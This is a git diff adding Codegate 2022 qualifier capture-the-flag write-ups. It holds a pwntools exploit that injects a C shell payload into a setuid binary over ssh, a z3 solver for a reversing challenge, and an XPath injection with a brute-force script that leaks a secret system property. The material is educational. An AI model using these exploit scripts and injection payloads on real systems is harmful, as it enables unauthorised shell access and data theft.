+pause()
+do_compile()
+io.interactive()
+
+
+
+
+
+
+
The setup actually allowed you to get a terminal on the server. However, since the flag is only readable by root and the challenge binary is setuid, we still need to pwn the binary. ↩
+
+
diff --git a/Codegate-2022-quals/pwn/vimt.md b/Codegate-2022-quals/pwn/vimt.md
new file mode 100755
index 0000000..d1a71da
--- /dev/null
+++ b/Codegate-2022-quals/pwn/vimt.md
@@ -0,0 +1,253 @@
+# VIMT
+
+**Author**: [gallileo](https://twitter.com/galli_leo_)
+
+**Tags:** pwn
+
+**Points:** 856 (21 solves)
+
+**Description:**
+
+> `ssh ctf@3.38.59.103 -p 1234 password: ctf1234_smiley`
+>
+> Monkeys help you
+
+Although a somewhat unconventional setup (ssh'ing into the binary[^1]), the binary itself is fairly simple and even comes with symbols. The basic functionality is as follows:
+
+The binary creates a 2D map the size of your terminal. In a loop, it waits for you to enter a character. The character gets placed at the current position in the map, followed by 5 random characters. In addition, sending a `\x1b` character lets us execute a command. The interesting commands are:
+
+- `compile`: Compiles the current map as C code and executes the result.
+- `set`: Set the y coordinate of the current map position.
+
+We also notice some interesting setup code in `init`:
+
+```c
+v4 = clock();
+v3 = time(0LL);
+v0 = getpid();
+v1 = mix(v4, v3, v0); // some z3 looking combination of inputs.
+srand(v1);
+```
+
+To me it looked like the intended solution might have been to reverse the mix function and recover the random seed in order to predict which additional letters get added to the map. However, we can actually solve this without doing that.
+I noticed that with a prime terminal width we can also set the x coordinate. If we can set the x coordinate, we can of course create arbitrary map contents.
+
+If our terminal has a width of 29 and every time we enter a character the x position moves by 6, we can do the following:
+
+1. Enter 5 characters, now x position moves by 30 (with wrap around)
+2. This means x position is now actually one after the original x position
+
+Since we can reset the y position to the original value, we can control the x position and hence write anything on the map. Since doing this on the server was very slow (for some reason) and I probably made a mistake in my Python code (more than one line would break it), we wanted a payload shorter than 29 characters. Luckily the following worked: `main(){system("sh");}//`.
+
+Now the only thing left was fighting with pwntools, ssh and pseudoterminals (aka try random options until you get it to work) to actually have the correctly sized terminal on the remote. After that, it was just waiting around 20 minutes and then we got a shell. For some reason, I did not see any stdout of the remote terminal (except newlines maybe), so I had to exfil the flag with some bash magic.
+
+The final exploit script:
+
+```python
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template app
+from pwn import *
+import random
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF('app')
+
+
+def local(argv=[], *a, **kw):
+ '''Start the exploit against the target.'''
+ if args.GDB:
+ return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+ else:
+ return process([exe.path] + argv, stdin=PTY, raw=False, *a, **kw)
+
+def remote():
+ #return ssh("ctf", host="3.38.59.103", port=1234, password="ctf1234_smiley")
+ # stty cols 29 rows 12
+ p = process("sshpass -e ssh -tt ctf@3.38.59.103 -p 1234 'bash -i'", shell=True, env={"SSHPASS": "ctf1234_smiley"})
+ p.sendlineafter("~$ ", "stty cols 29 rows 12")
+ p.sendlineafter("~$ ", "./app")
+ return p
+
+def start(*a, **kw):
+ if args.LOCAL:
+ return local(*a, **kw)
+ return remote(*a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Partial RELRO
+# Stack: No canary found
+# NX: NX enabled
+# PIE: No PIE (0x400000)
+
+#### remote comms
+WIDTH = 29
+HEIGHT = 10
+
+def read_mappa():
+    begin = io.recvuntil(b"-"*WIDTH)
+    read_map = io.recvuntil(b"-"*WIDTH)
+    log.debug("REMOTE MAP:\n%s", read_map.decode("utf8", errors="ignore"))
+    return begin + read_map
+
+def send_data(data):
+    if isinstance(data, str):
+        data = data.encode("utf8")
+    io.send(data)
+    return read_mappa()
+
+def send_command(cmd, read = True):
+    io.send(b"\x1b")
+    if isinstance(cmd, str):
+        cmd = cmd.encode("utf8")
+    io.sendline(cmd)
+    if read:
+        return read_mappa()
+    return None
+
+def do_compile():
+    return send_command("compile", False)
+
+def do_set_y(y_val):
+    return send_command(f"set y {y_val}")
+
+RAND_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}!"
+
+log.info("Using terminal of size %d x %d", WIDTH, HEIGHT)
+
+mappa = []
+for y in range(HEIGHT):
+    row = ""
+    for x in range(WIDTH):
+        row += " "
+    mappa.append(row)
+
+cur_x = 0
+cur_y = 0
+
+def check_coords_up():
+    global cur_x, cur_y
+    if cur_x >= WIDTH:
+        cur_x = 0
+        cur_y += 1
+    if cur_y >= HEIGHT:
+        cur_y = HEIGHT - 1
+
+def set_car(car):
+    global mappa, cur_y, cur_x
+    row = mappa[cur_y]
+    mappa[cur_y] = row[:cur_x] + car + row[cur_x+1:]
+
+def inpKey(car):
+    global cur_x
+    rem_map = send_data(car)
+    check_coords_up()
+    set_car(car)
+    cur_x += 1
+    for i in range(5):
+        check_coords_up()
+        rand_car = random.choice(RAND_CHARS)
+        set_car(rand_car)
+        cur_x += 1
+    return rem_map
+
+def set_y(y_val):
+    global cur_y
+    do_set_y(y_val)
+    cur_y = y_val
+
+def set_x(x_val):
+    global cur_y, cur_x
+    if cur_x == x_val:
+        return
+    # this is more involved!
+
+    # number of times to enter a character for a row to be filled.
+    # every time we enter a character, we write 6 to the map!
+    min_to_fill = (WIDTH // 6) + 1
+    # number of characters the new x position on the next row will be offset
+    offset = min_to_fill * 6 - WIDTH
+    # we could actually use any offset, would just mean more math lol
+    assert offset == 1
+    # number of characters difference between desired and required x val
+    diff = (x_val - cur_x)
+    if diff < 0:
+        diff += WIDTH
+    num_inputs = (diff // offset) * min_to_fill
+    log.debug("Additional inputs: %d", num_inputs)
+    for k in range(num_inputs):
+        inpKey("G")
+    log.debug("cur_x %d vs x_val %d", cur_x, x_val)
+    assert cur_x == x_val
+
+
+def pmap():
+    log.info("MAP:\n%s", "\n".join(mappa))
+
+def write_line(y, s: str):
+    log.debug("Writing line %s @ y = %d", s, y)
+    for idx, car in enumerate(s):
+        set_x(idx)
+        set_y(y)
+        inpKey(car)
+    set_x(len(s))
+    set_y(y)
+    inpKey("\n")
+
+def write_str(start_x, start_y, s: str):
+    x = start_x
+    y = start_y
+    for idx, car in enumerate(s):
+
+        if x >= WIDTH:
+            x = 0
+            y += 1
+        if y >= HEIGHT:
+            log.error("FAILED TO WRITE STRING!")
+        log.info("Writing %s at %d, %d", car, x, y)
+        set_x(x)
+        set_y(y)
+        rem_map = inpKey(car)
+        if idx % 10:
+            log.info("remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
+        x += 1
+
+log.info("Initial map:")
+pmap()
+
+io = start()
+# io.interactive()
+init_map = read_mappa()
+log.info("init remote map:\n%s", init_map.decode("utf8", errors="ignore"))
+
+PAYLOAD = """main(){system("sh");}//"""
+log.info("PAYLOAD:\n%s", PAYLOAD)
+
+write_str(0, 0, PAYLOAD)
+log.info("map with payload:")
+pmap()
+log.info("Writing map to file: test.c")
+with open("test.c", "w") as f:
+    f.write("".join(mappa))
+
+rem_map = send_data("$")
+log.info("Remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
+pause()
+do_compile()
+io.interactive()
+
+```
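
The column arithmetic that `set_x` relies on can be checked in isolation. The following is only a simplified model and not part of the exploit: it assumes the cursor wraps modulo the row width and ignores the clamping on the last row, and `x_after` is a hypothetical helper introduced for illustration.

```python
WIDTH = 29          # terminal columns, as in the exploit script
CHARS_PER_KEY = 6   # one typed character plus five random ones

def x_after(keys, x0=0):
    """Column of the cursor after `keys` key presses, starting at column x0."""
    return (x0 + keys * CHARS_PER_KEY) % WIDTH

# Five key presses write 30 characters: one full row plus one extra column.
keys_per_row = WIDTH // CHARS_PER_KEY + 1
shift = keys_per_row * CHARS_PER_KEY - WIDTH

print(keys_per_row, shift, x_after(keys_per_row))
```

Under this model, moving the cursor `k` columns to the right costs `5 * k` key presses, which is what `num_inputs` computes in the script.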
+
+[^1]: The setup actually allowed you to get a terminal on the server. However, since the flag is only readable by root and the challenge binary is setuid, we still need to pwn the binary.
diff --git a/Codegate-2022-quals/rev/vlfv.html b/Codegate-2022-quals/rev/vlfv.html
new file mode 100755
index 0000000..3438ff5
--- /dev/null
+++ b/Codegate-2022-quals/rev/vlfv.html
@@ -0,0 +1,392 @@
+Very Long Flag Validator | Organisers
After opening the binary in ida and adjusting the maximum size for functions
+to actually get a nicer decompilation, I could identify some C++ functions
+(it took some time to figure out that IDA had applied wrong Lumina data and
+it was actually just vector::push_back and not some variadic thingy…).
+
+
Anyway, after identifying that the main struct initialized in main is
+64 vectors, 64 mutexes, 64 condition variables and 64 chars and that
+this struct is passed to 64 threads it was pretty clear that there will be
+some inter-thread communication.
+
+
So after looking at the first thread’s function for some time I realized
+that it locks the lock with a certain index in the struct, then checks if
+there’s something in the vector and if not, it waits using the condition
+variable with the same index as the lock. Then it pops a value from the vector,
+(by getting the start pointer, dereffing and then popping the value using again
+a C++ function which was a bit tricky to identify).
+
+
This value is then split into its lowest bit and its upper bits. The upper
+bits are compared with certain values (different in each function); if one of
+them matches, we store the lowest bit in a local variable (which was
+initialized to -1 to signify no value). There are always three inputs which
+belong together: they are the inputs of a full adder, so we have three inputs
+and two outputs. The carry is pushed into the vector of the next function (in
+the order they were started in / are stored in the binary), with the upper
+bits set to one of the values that function is expecting. The xor of the
+three inputs is pushed into the vector of the same function, again tagged
+with one of the upper-bit values this function is expecting.
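
To make the tagged-value encoding concrete, here is a minimal sketch of one station. The names `pack`, `unpack` and `full_adder` are made up for illustration and do not appear in the binary; the layout (bit 0 is the data bit, everything above is the tag) is the one described above.

```python
def pack(tag, bit):
    """Combine a tag and a data bit into one queue value."""
    return (tag << 1) | bit

def unpack(value):
    """Split a queue value into (tag, data bit)."""
    return value >> 1, value & 1

def full_adder(a, b, c):
    """Return (sum bit, carry bit) for three input bits."""
    total = a ^ b ^ c
    carry = (a & b) | (a & c) | (b & c)
    return total, carry

tag, bit = unpack(pack(0xEC, 1))
print(hex(tag), bit, full_adder(1, 1, 0))
```

The sum bit stays with the same station and the carry bit goes to the next one, each re-packed with a tag the receiver is waiting for.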
+
+
Parsing of the stuff (pain)
+
+
So this seems to be a dataflow machine: each function is an adding station,
+and it waits for certain tagged inputs to add them. There are eight functions
+which belong together in the sense that the carry will go to the next function.
+There are eight such groups of eight functions, for a total of 64
+functions. At this point I assumed that it doesn’t matter in which function
+we are and that we just need to care about the tag of the inputs/outputs,
+so I spent a long time to come up with a good way to parse all the station’s
+inputs and outputs. In the end I came up with the following grep command:
+objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2
+which prints all the compares. Since grep is smart, it prints consecutive
+matches as one block and then separates different blocks by a single line
+of --. So by counting the amount of newlines between two -- I was able
+to determine if it was a block where we check for the two or three input
+tag numbers. Then I just extracted the numbers from the compare instructions
+to get the inputs. Finally if there was an or instruction I assumed that this
+sets the upper bits of the output, there were some complications with this,
+as the compiler is smart and emits an or ah, 1 in cases where the tag
+was 256, so I had to adjust that (and spend about an hour to find a bug
+as one single function used dh instead of ah…).
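
The `ah`/`dh` complication boils down to the fact that an `or` on a high-byte register sets bits 8 to 15, so its immediate has to be shifted left by eight. A small sketch of that fix-up follows; `or_immediate` is a hypothetical helper and the sample lines are made-up objdump-style output, not copied from the binary.

```python
import re

HIGH_BYTE_REGS = {"ah", "bh", "ch", "dh"}

# Matches "or <reg>,<imm>" but not "xor": \b needs a non-word char before "or".
OR_RE = re.compile(r"\bor\s+(\w+),\s*(0x[0-9a-fA-F]+|\d+)")

def or_immediate(line):
    """Return the value OR-ed into the full register, or None if no match."""
    match = OR_RE.search(line)
    if match is None:
        return None
    reg, imm = match.group(1), int(match.group(2), 0)
    # Writing to ah/bh/ch/dh affects bits 8..15 of the full register.
    return imm << 8 if reg in HIGH_BYTE_REGS else imm

print(hex(or_immediate("  40123a:\t80 cc 01\tor     ah,0x1")))
```

The solver script does the same thing with plain string checks (`"ah" in fl or "dh" in fl`).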
+
+
After having parsed all of these things it’s just a matter of putting
+all the initial values and rules into z3 and letting it solve for the
+correct input. This was easily done, as I could just copy the decompiled
+code from main, fix up a few bits (again because of the ah). Then
+I could easily parse that code to get the tags and corresponding values
+(whether that was a constant or one of our input bits).
+
+
Final script
+
+
The final script to parse all the things and solve looks like this:
+
+from z3 import *
+
+# objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2 > cmps
+x = open("cmps").read().split("--")
+
+#the tags which symbolize the final value of a station
+tgts = [0xec,0x16d,0x182,0x185,0x194,0x197,0x1a0,0x1a3,0x2ae,0x2cf,0x2d2,0x2e4,0x2f3,0x2ff,0x308,0x30e,0x4cd,0x4d0,0x4e5,0x4e8,0x4f7,0x4fa,0x4fd,0x503,0x57e,0x6a4,0x6b9,0x6bc,0x6cb,0x6ce,0x6d7,0x6dd,0x800,0x84e,0x863,0x866,0x869,0x86c,0x86f,0x875,0xa43,0xa46,0xa5b,0xa6d,0xa7c,0xa7f,0xa88,0xa8e,0xb6c,0xbd5,0xbff,0xc02,0xc11,0xc1d,0xc20,0xc26,0xce3,0xdb8,0xdcd,0xdd0,0xdd3,0xdd6,0xdd9,0xddf]
+# order the threads are started in
+bitorder = [2,28,46,4,32,5,14,40,29,43,25,0,19,35,16,63,59,7,24,22,62,30,36,56,44,42,6,11,58,47,39,34,17,31,26,41,37,3,50,53,13,27,21,49,1,12,51,20,9,52,55,18,10,15,61,8,38,45,23,54,33,60,57,48]
+# the expected outputs, checked in main
+expected = [1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1]
+
+last_outs = []
+last_inputs = []
+
+# init solver & values for each tag
+s = Solver()
+tags = [Bool(f"tag_{i}") for i in range(3554)]
+
+# pushes from main
+xx = open("pushes.c").read().split("\n")
+
+bit = 0
+tag = 0
+inputs = [Bool(f"in[{i}]") for i in range(64)] # our input, 64 bits (aka 8 bytes == 16 hex chars)
+consts = [0]*64
+for i,l in enumerate(xx):
+    if l == "": continue
+    if i & 1:
+        idx = int(l.split("[")[1].split("]")[0])
+        s.add(tags[tag] == bit)
+    else:
+        if "|" in l:
+            tag = eval(l.split("|")[1].split(";")[0].strip())
+            assert(tag & 1 == 0)
+            tag >>= 1
+            input_idx = int(l.split("[")[1].split("]")[0])
+            bit = inputs[input_idx]
+        else:
+            val = int(l.split("=")[1].strip()[:-1])
+            bit = (val & 1) == 1
+            tag = val >> 1
+            consts[tag] = bit
+
+# the constant values
+#print([1 if x else 0 for x in consts])
+
+# the adding stations...
+idx = -5
+for i in x:
+    if "ret" in i:
+        idx += 1
+        if idx == 64:
+            break
+
+    fl = i.split("\n")[1]
+    if "or" in fl and "0x" in fl:
+        xx = int(fl.split(",")[-1].strip(),0)
+        if xx > 0x10000:
+            xx = xx & 0xff
+        if "ah" in fl or "dh" in fl:# man fuck dh
+            xx<<=8
+
+        assert(xx&1 == 0)
+        last_outs.append(xx>>1)
+
+        if (idx in [7, 15, 23, 31, 39, 47, 55, 63] and len(last_outs) == 1) or len(last_outs) == 2:
+            #print(last_inputs, "=>", last_outs)
+            xored_tgt = last_outs[-1]
+
+            if len(last_inputs) == 2:
+                s.add(Xor(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[xored_tgt])
+            else:
+                # Man fuck z3, why does it allow Xor(a,b,c) with three inputs but doesn't fucking work
+                # This could've been solved like 3 hours earlier but because of this fucking
+                # z3 thingy they were lost, rip
+                s.add(Xor(Xor(tags[last_inputs[0]], tags[last_inputs[1]]), tags[last_inputs[2]]) == tags[xored_tgt])
+
+            if xored_tgt in tgts:
+                print("Target found: ", idx, last_inputs, last_outs)
+
+            if len(last_outs) == 2:
+                ovf_tgt = last_outs[0]
+                #print(idx, last_inputs, last_outs)
+                if len(last_inputs) == 2:
+                    s.add(And(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[ovf_tgt])
+                else:
+                    a, b, c = tags[last_inputs[0]], tags[last_inputs[1]], tags[last_inputs[2]]
+                    s.add(Or(And(a,b), And(a,c), And(b,c)) == tags[ovf_tgt])
+
+    if i.count("\n") > 6:
+        last_inputs = []
+        last_outs = []
+        for l in i.split("\n"):
+            if "cmp" in l:
+                last_inputs.append(int(l.split(",")[-1],0))
+        last_inputs = list(set(last_inputs))
+        #print(idx, last_inputs)
+
+# extract the resulting bits
+results = [tags[tgts[i]] for i in range(64)]
+
+# add the conditions
+for i in range(64):
+    s.add(results[i] == (1==expected[bitorder[i]]))
+
+if s.check() == sat:
+    m = s.model()
+    x = ""
+    for i in inputs:
+        print(1 if m[i] else 0,end="")
+        x += "1" if m[i] else "0"
+    print()
+    print(hex(int(x[::-1],2))[:1:-1])
+else:
+    print("oof")
+
diff --git a/Codegate-2022-quals/rev/vlfv.md b/Codegate-2022-quals/rev/vlfv.md
new file mode 100755
index 0000000..03bc713
--- /dev/null
+++ b/Codegate-2022-quals/rev/vlfv.md
@@ -0,0 +1,192 @@
+# Very Long Flag Validator
+
+**Author**: TheBadGod
+
+**Tags:** rev
+
+**Points:** 1000 (2 solves)
+
+**Description:**
+
+> Can you find the flag?
+
+#### Initial reversing
+
+After opening the binary in ida and adjusting the maximum size for functions
+to actually get a nicer decompilation, I could identify some C++ functions
+(it took some time to figure out that IDA had applied wrong Lumina data and
+it was actually just `vector::push_back` and not some variadic thingy...).
+
+Anyway, after identifying that the main struct initialized in main is
+64 vectors, 64 mutexes, 64 condition variables and 64 chars and that
+this struct is passed to 64 threads it was pretty clear that there will be
+some inter-thread communication.
+
+So after looking at the first thread's function for some time I realized
+that it locks the lock with a certain index in the struct, then checks if
+there's something in the vector and if not, it waits using the condition
+variable with the same index as the lock. Then it pops a value from the vector,
+(by getting the start pointer, dereffing and then popping the value using again
+a C++ function which was a bit tricky to identify).
+
+This value is then split into its lowest bit and its upper bits. The upper
+bits are compared with certain values (different in each function); if one of
+them matches, we store the lowest bit in a local variable (which was
+initialized to -1 to signify no value). There are always three inputs which
+belong together: they are the inputs of a full adder, so we have three inputs
+and two outputs. The carry is pushed into the vector of the next function (in
+the order they were started in / are stored in the binary), with the upper
+bits set to one of the values that function is expecting. The xor of the
+three inputs is pushed into the vector of the same function, again tagged
+with one of the upper-bit values this function is expecting.
+
+#### Parsing of the stuff (pain)
+
+So this seems to be a dataflow machine: each function is an adding station,
+and it waits for certain tagged inputs to add them. There are eight functions
+which belong together in the sense that the carry will go to the next function.
+There are eight such groups of eight functions, for a total of 64
+functions. At this point I assumed that it doesn't matter in which function
+we are and that we just need to care about the tag of the inputs/outputs,
+so I spent a long time to come up with a good way to parse all the station's
+inputs and outputs. In the end I came up with the following grep command:
+`objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2`
+which prints all the compares. Since grep is smart, it prints consecutive
+matches as one block and then separates different blocks by a single line
+of `--`. So by counting the amount of newlines between two `--` I was able
+to determine if it was a block where we check for the two or three input
+tag numbers. Then I just extracted the numbers from the compare instructions
+to get the inputs. Finally if there was an or instruction I assumed that this
+sets the upper bits of the output, there were some complications with this,
+as the compiler is smart and emits an `or ah, 1` in cases where the tag
+was 256, so I had to adjust that (and spend about an hour to find a bug
+as one single function used dh instead of ah...).
+
+After having parsed all of these things it's just a matter of putting
+all the initial values and rules into z3 and letting it solve for the
+correct input. This was easily done, as I could just copy the decompiled
+code from main, fix up a few bits (again because of the ah). Then
+I could easily parse that code to get the tags and corresponding values
+(whether that was a constant or one of our input bits).
+
+#### Final script
+
+The final script to parse all the things and solve looks like this:
+```python
+from z3 import *
+
+# objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2 > cmps
+x = open("cmps").read().split("--")
+
+#the tags which symbolize the final value of a station
+tgts = [0xec,0x16d,0x182,0x185,0x194,0x197,0x1a0,0x1a3,0x2ae,0x2cf,0x2d2,0x2e4,0x2f3,0x2ff,0x308,0x30e,0x4cd,0x4d0,0x4e5,0x4e8,0x4f7,0x4fa,0x4fd,0x503,0x57e,0x6a4,0x6b9,0x6bc,0x6cb,0x6ce,0x6d7,0x6dd,0x800,0x84e,0x863,0x866,0x869,0x86c,0x86f,0x875,0xa43,0xa46,0xa5b,0xa6d,0xa7c,0xa7f,0xa88,0xa8e,0xb6c,0xbd5,0xbff,0xc02,0xc11,0xc1d,0xc20,0xc26,0xce3,0xdb8,0xdcd,0xdd0,0xdd3,0xdd6,0xdd9,0xddf]
+# order the threads are started in
+bitorder = [2,28,46,4,32,5,14,40,29,43,25,0,19,35,16,63,59,7,24,22,62,30,36,56,44,42,6,11,58,47,39,34,17,31,26,41,37,3,50,53,13,27,21,49,1,12,51,20,9,52,55,18,10,15,61,8,38,45,23,54,33,60,57,48]
+# the expected outputs, checked in main
+expected = [1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1]
+
+last_outs = []
+last_inputs = []
+
+# init solver & values for each tag
+s = Solver()
+tags = [Bool(f"tag_{i}") for i in range(3554)]
+
+# pushes from main
+xx = open("pushes.c").read().split("\n")
+
+bit = 0
+tag = 0
+inputs = [Bool(f"in[{i}]") for i in range(64)] # our input, 64 bits (aka 8 bytes == 16 hex chars)
+consts = [0]*64
+for i,l in enumerate(xx):
+    if l == "": continue
+    if i & 1:
+        idx = int(l.split("[")[1].split("]")[0])
+        s.add(tags[tag] == bit)
+    else:
+        if "|" in l:
+            tag = eval(l.split("|")[1].split(";")[0].strip())
+            assert(tag & 1 == 0)
+            tag >>= 1
+            input_idx = int(l.split("[")[1].split("]")[0])
+            bit = inputs[input_idx]
+        else:
+            val = int(l.split("=")[1].strip()[:-1])
+            bit = (val & 1) == 1
+            tag = val >> 1
+            consts[tag] = bit
+
+# the constant values
+#print([1 if x else 0 for x in consts])
+
+# the adding stations...
+idx = -5
+for i in x:
+    if "ret" in i:
+        idx += 1
+        if idx == 64:
+            break
+
+    fl = i.split("\n")[1]
+    if "or" in fl and "0x" in fl:
+        xx = int(fl.split(",")[-1].strip(),0)
+        if xx > 0x10000:
+            xx = xx & 0xff
+        if "ah" in fl or "dh" in fl:# man fuck dh
+            xx<<=8
+
+        assert(xx&1 == 0)
+        last_outs.append(xx>>1)
+
+        if (idx in [7, 15, 23, 31, 39, 47, 55, 63] and len(last_outs) == 1) or len(last_outs) == 2:
+            #print(last_inputs, "=>", last_outs)
+            xored_tgt = last_outs[-1]
+
+            if len(last_inputs) == 2:
+                s.add(Xor(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[xored_tgt])
+            else:
+                # Man fuck z3, why does it allow Xor(a,b,c) with three inputs but doesn't fucking work
+                # This could've been solved like 3 hours earlier but because of this fucking
+                # z3 thingy they were lost, rip
+                s.add(Xor(Xor(tags[last_inputs[0]], tags[last_inputs[1]]), tags[last_inputs[2]]) == tags[xored_tgt])
+
+            if xored_tgt in tgts:
+                print("Target found: ", idx, last_inputs, last_outs)
+
+            if len(last_outs) == 2:
+                ovf_tgt = last_outs[0]
+                #print(idx, last_inputs, last_outs)
+                if len(last_inputs) == 2:
+                    s.add(And(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[ovf_tgt])
+                else:
+                    a, b, c = tags[last_inputs[0]], tags[last_inputs[1]], tags[last_inputs[2]]
+                    s.add(Or(And(a,b), And(a,c), And(b,c)) == tags[ovf_tgt])
+
+    if i.count("\n") > 6:
+        last_inputs = []
+        last_outs = []
+        for l in i.split("\n"):
+            if "cmp" in l:
+                last_inputs.append(int(l.split(",")[-1],0))
+        last_inputs = list(set(last_inputs))
+        #print(idx, last_inputs)
+ #print(idx, last_inputs)
+
+# extract the resulting bits
+results = [tags[tgts[i]] for i in range(64)]
+
+# add the conditions
+for i in range(64):
+    s.add(results[i] == (1==expected[bitorder[i]]))
+
+if s.check() == sat:
+    m = s.model()
+    x = ""
+    for i in inputs:
+        print(1 if m[i] else 0,end="")
+        x += "1" if m[i] else "0"
+    print()
+    print(hex(int(x[::-1],2))[:1:-1])
+else:
+    print("oof")
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/web/babyfirst.html b/Codegate-2022-quals/web/babyfirst.html
new file mode 100755
index 0000000..98a5a50
--- /dev/null
+++ b/Codegate-2022-quals/web/babyfirst.html
@@ -0,0 +1,272 @@
+babyFirst | Organisers
The memo application babyFirst allows writing, listing and reading memos. The complete application logic is in MemoServlet.class. After decompilation we see the request routing and user/session handling. The only function that stands out as exploitable is lookupImg(), which gets called when viewing a memo.
A java.net.URL object is created for a URL given in square brackets. Out of the box, Java supports several protocols such as http, https and file (for local file reads). The file protocol is blacklisted, and since the given URL is lowercased first, we can’t bypass the check with FILE:///flag. Looking into the java.net.URL source code, we find the following special case in the URI parsing:
myblog is a simple blog that allows registering a user as well as reading and writing blog posts that have a title and content. The complete application logic is in blogServlet.class. After decompilation we see the request routing and user/session handling. The only function that stands out as exploitable is doReadArticle(), which gets called when viewing a blog post.
Since the idx parameter is unfiltered and goes straight into an XPath evaluation, we can inject into the XPath expression. The flag is placed in Tomcat’s catalina.properties, which means it is available as a system property called flag. Luckily, XPath allows us to access a system property using fn:system-property(), as documented in the XSL function spec.
+
+
We can use the XPath injection as a true/false oracle. After creating a blog post containing the word MARKER in title and content, we use the following script to brute-force the flag with the injection 1' and starts-with(system-property('flag'),'FLAGHERE') or ':
+
+
#!/usr/bin/python
+import requests, string
+headers = {"Cookie":"JSESSIONID=42442D352EBC41CE4FE07B8C0B72820C"}
+chars = "abcdef0123456789}{"
+
+url = 'http://3.39.79.180/blog/read?idx=1%27%20and%20starts-with(system-property(%27flag%27),%27{0}%27)%20or%20%27'
+p = 'codegate2022{'
+while not p.endswith('}'):
+    print(p)
+    for x in chars:
+        r = requests.get(url.format(p+x), headers=headers, allow_redirects=False)
+        if "MARKER" in r.text:
+            p += x
+            break
+print(p)
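
To see why this payload behaves as an oracle, it helps to expand the string concatenation that doReadArticle() performs. The sketch below only rebuilds the query string; `title_query` and `payload` are hypothetical helpers written for illustration, not code from the servlet.

```python
def title_query(idx: str) -> str:
    # Mirrors the concatenation used for the title lookup in doReadArticle().
    return "//article[@idx='" + idx + "']/title/text()"

def payload(prefix: str) -> str:
    # The trailing "or '" only exists to consume the closing quote.
    return "1' and starts-with(system-property('flag'),'" + prefix + "') or '"

query = title_query(payload("codegate2022{"))
print(query)
```

In the resulting predicate `and` binds tighter than `or`, and the empty string is false, so article 1 (and its MARKER text) is only returned when the guessed prefix matches.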
diff --git a/Codegate-2022-quals/web/myblog.md b/Codegate-2022-quals/web/myblog.md
new file mode 100755
index 0000000..5f0e232
--- /dev/null
+++ b/Codegate-2022-quals/web/myblog.md
@@ -0,0 +1,57 @@
+# Myblog
+
+**Author**: jkr
+
+**Tags:** web
+
+**Points:** 884 (19 solves)
+
+**Description:**
+
+> I made a blog. Please check the security.
+
+myblog is a simple blog that allows registering a user as well as reading and writing blog posts that have a title and content. The complete application logic is in `blogServlet.class`. After decompilation we see the request routing and user/session handling. The only function that stands out as exploitable is `doReadArticle()`, which gets called when viewing a blog post.
+
+```java=
+    private String[] doReadArticle(HttpServletRequest req) {
+        String id = (String)req.getSession().getAttribute("id");
+        String idx = req.getParameter("idx");
+        if ("null".equals(id) || idx == null)
+            return null;
+        File userArticle = new File(this.tmpDir + "/article/", id + ".xml");
+        try {
+            InputSource is = new InputSource(new FileInputStream(userArticle));
+            Document document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(is);
+            XPath xpath = XPathFactory.newInstance().newXPath();
+            String title = (String)xpath.evaluate("//article[@idx='" + idx + "']/title/text()", document, XPathConstants.STRING);
+            String content = (String)xpath.evaluate("//article[@idx='" + idx + "']/content/text()", document, XPathConstants.STRING);
+            title = decBase64(title.trim());
+            content = decBase64(content.trim());
+            return new String[] { title, content };
+        } catch (Exception e) {
+            System.out.println(e.getMessage());
+            return null;
+        }
+    }
+```
+
+Since the `idx` parameter is unfiltered and goes straight into an XPath evaluation, we can inject into the XPath expression. The flag is placed in Tomcat's `catalina.properties`, which means it is available as a system property called `flag`. Luckily, XPath allows us to access a system property using `fn:system-property()`, as documented in the [XSL function spec](https://www.w3schools.com/xml/func_systemproperty.asp).
+
+We can use the XPath injection as a true/false oracle. After creating a blog post containing the word `MARKER` in title and content, we use the following script to brute-force the flag with the injection `1' and starts-with(system-property('flag'),'FLAGHERE') or '`:
+
+```python=
+#!/usr/bin/python
+import requests, string
+headers = {"Cookie":"JSESSIONID=42442D352EBC41CE4FE07B8C0B72820C"}
+chars = "abcdef0123456789}{"
+
+url = 'http://3.39.79.180/blog/read?idx=1%27%20and%20starts-with(system-property(%27flag%27),%27{0}%27)%20or%20%27'
+p = 'codegate2022{'
+while not p.endswith('}'):
+    print(p)
+    for x in chars:
+        r = requests.get(url.format(p+x), headers=headers, allow_redirects=False)
+        if "MARKER" in r.text:
+            p += x
+            break
+print(p)
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/web/superbee.html b/Codegate-2022-quals/web/superbee.html
new file mode 100755
index 0000000..3838653
--- /dev/null
+++ b/Codegate-2022-quals/web/superbee.html
@@ -0,0 +1,232 @@
+superbee | Organisers
We have an API with the following relevant endpoints:
+1) /main/index gives us the flag provided that we have the session cookie set to MD5("admin" + auth_key).
